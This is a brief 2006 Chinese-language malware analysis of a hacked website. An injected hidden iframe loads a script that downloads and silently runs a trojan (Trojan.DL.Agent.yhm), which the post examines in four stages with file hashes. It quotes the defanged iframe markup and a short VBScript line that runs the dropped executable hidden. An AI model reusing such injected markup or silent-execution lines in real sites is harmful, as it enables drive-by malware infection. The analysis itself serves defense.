一个被加入下载Trojan.DL.Agent.yhm的代码的网站

endurer 原创
2006-12-18 第1版

网站首页被加入代码：

/----------
＜iFrAmE SRc＝hxxp://*58.215.*65.2*1/*****/k.htm width＝1 height＝1 frameborder＝0＞＜/IfRaMe＞
---------/

k.htm Kaspersky报为Trojan-Downloader.JS.Agent.bz，其内容可以分为4段。
第1段:
利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 xxxx.exe，保存为 C:/windows/qing.exe，并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

xxxx.exe使用Watcom C/C++ EXE编译，
/-------
文件说明符 : D:/xxxx.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2006-12-18 12:51:52
修改时间 : 2006-12-18 12:54:8
访问时间 : 2006-12-18 12:55:36
大小 : 19968 字节 19.512 KB
MD5 : d66859a23da410c0ca9e8daf387565b9
-------/
Kaspersky 报为：Trojan-Downloader.Win32.Agent.ue，瑞星 报为：Trojan.DL.Agent.yhm。

第2、3段：
是用unescape()和Encode多次加密的VBScript脚本程序，功能是下载yt.vbs，保存为%temp%/yt.vbs，并运行。
yt.vbs的内容为：
/--------------
wscript.sleep 0
wscript.createobject("wscript.shell").run "C:/windows/qing.exe",0
--------------/
功能是运行第1段代码下载的文件C:/windows/qing.exe。

第4段：
打开网页count.html
count.html其实是个CHM文件，释放并运行QQ.EXE。
此QQ.EXE与上面的xxxx.exe完全相同。